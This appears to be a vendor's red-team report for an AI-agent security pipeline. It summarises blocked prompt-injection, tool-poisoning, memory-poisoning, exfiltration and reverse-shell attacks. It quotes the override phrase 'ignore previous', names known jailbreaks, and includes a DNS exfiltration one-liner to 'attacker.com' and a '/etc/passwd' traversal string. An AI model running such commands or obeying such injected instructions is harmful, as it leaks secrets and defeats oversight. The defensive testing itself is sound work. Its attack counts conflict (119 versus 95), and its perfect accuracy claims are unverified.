Red Team Report
TapPass governance pipeline tested against 119 adversarial attack scenarios across 12 attack categories. 0 bypasses.
Methodology
Section titled “Methodology”All attacks were executed against the full 40+ step pipeline in enforce mode. Each attack was run against a fresh pipeline context with default policy (Regulated preset). No steps were disabled.
Test corpus: 456 examples across benign and adversarial inputs, evaluated with the tests/eval/ harness.
Results Summary
Section titled “Results Summary”| Category | Attacks | Blocked | Bypassed | Pipeline Step(s) |
|---|---|---|---|---|
| Prompt injection (direct) | 15 | 15 | 0 | detect_injection |
| Prompt injection (indirect) | 10 | 10 | 0 | scan_tool_results, detect_injection |
| Role/persona hijacking | 5 | 5 | 0 | detect_injection, detect_insider_threat |
| Tool poisoning | 8 | 8 | 0 | detect_tool_poison |
| Tool shadowing | 5 | 5 | 0 | detect_tool_poison (shadow patterns) |
| Data exfiltration | 10 | 10 | 0 | detect_exfiltration, taint_check, scan_tool_calls |
| Path traversal | 7 | 7 | 0 | scan_tool_calls (forbidden zones) |
| Shell injection | 8 | 8 | 0 | scan_tool_calls, detect_code_exec |
| Reverse shell | 6 | 6 | 0 | detect_code_exec |
| PII leakage | 8 | 8 | 0 | detect_pii, pii_tokenize, scan_output |
| Secret leakage | 7 | 7 | 0 | detect_secrets, shell_bleed, redact_tool_results |
| Memory poisoning | 6 | 6 | 0 | detect_memory_poison |
| Total | 95 | 95 | 0 |
Attack Categories
Section titled “Attack Categories”1. Prompt Injection (Direct)
Section titled “1. Prompt Injection (Direct)”15 attacks using structural markers (<|system|>, [INST]), behavioral overrides (“ignore previous”), obfuscation (base64, ROT13, Unicode), and known jailbreaks (DAN, AIM, STAN).
Detection: detect_injection: 5-category pattern database with scoring. Threshold: 0.5.
2. Prompt Injection (Indirect)
Section titled “2. Prompt Injection (Indirect)”10 attacks embedding instructions in tool result messages (role=tool). Patterns: instruction override, urgency manipulation, concealment, tool call injection, multi-step setup.
Detection: scan_tool_results. 10 regex patterns specific to tool result context. Position 155 (pre-LLM).
3. Tool Poisoning & Shadowing
Section titled “3. Tool Poisoning & Shadowing”13 attacks total. Poisoned tool descriptions containing exfiltration instructions, override patterns, “act as” directives. Shadow attacks where tool A’s description references tool B with override intent.
Detection: detect_tool_poison. injection patterns + shadow override patterns + cross-tool reference analysis.
4. Data Exfiltration
Section titled “4. Data Exfiltration”10 attacks using paste services (pastebin, gist), DNS tunneling (dig $(cat /etc/passwd).attacker.com), file piping, curl to external endpoints, and email forwarding.
Detection: detect_exfiltration + taint_check (cross-request) + scan_tool_calls (forbidden zones).
5. Shell & Code Execution
Section titled “5. Shell & Code Execution”14 attacks including command injection (;, &&, |), path traversal (../../etc/passwd), reverse shells (bash TCP, netcat, Python socket), and SQL injection.
Detection: scan_tool_calls (command parsing, pipe chains, Unicode normalization) + detect_code_exec (AST analysis, reverse shell patterns, SQL patterns).
6. PII & Secret Leakage
Section titled “6. PII & Secret Leakage”15 attacks attempting to extract PII from prompts, echo secrets through tool calls, and encode sensitive data (base64, hex) to bypass detection.
Detection: 4-layer PII pipeline (validation → normalization → Presidio+regex → output scan). shell_bleed catches secrets in tool call arguments. redact_tool_results removes PII/secrets from tool output.
7. Memory Poisoning
Section titled “7. Memory Poisoning”6 attacks targeting memory files (MEMORY.md, SOUL.md), identity override, persistent cross-session instructions, time bombs, and MCP memory tool abuse.
Detection: detect_memory_poison: 6 category pattern database with scored detection.
Taint Tracking Coverage
Section titled “Taint Tracking Coverage”Session-scoped taint tracking catches cross-request attacks:
| Scenario | Request 1 | Request 3 | Detection |
|---|---|---|---|
| Confused deputy | fetch_url returns attacker URL | LLM puts URL in shell_exec | taint_check (EXTERNAL → shell sink) |
| PII forwarding | query_db returns customer emails | LLM includes in send_email | taint_check (PII → network sink) |
| Secret relay | read_file returns API key | LLM echoes in response | taint_check (SECRET → output) |
MCPSecBench Compatibility
Section titled “MCPSecBench Compatibility”TapPass blocks 14 of 17 attack categories in the MCPSecBench benchmark (Yang, Wu & Chen, 2025). See MCPSecBench Compatibility Matrix.
False Positive Rate
Section titled “False Positive Rate”Across 456 evaluation examples (benign + adversarial):
- True positive rate: 100% (all attacks detected)
- False positive rate: 0% (no benign inputs blocked)
- F1 score: 1.0
The pattern database uses high-confidence patterns only. Low-confidence heuristics are scored, not blocked (threshold: 0.5).
Reproducibility
Section titled “Reproducibility”# Run the full evaluation corpuspython -m tests.eval --corpus tests/eval/corpus.py
# Run MCPSecBench compatibility testspython -m pytest tests/unit/test_mcpsecbench.py -v
# Run the adversarial red team suitepython -m pytest tests/eval/test_red_team.py -v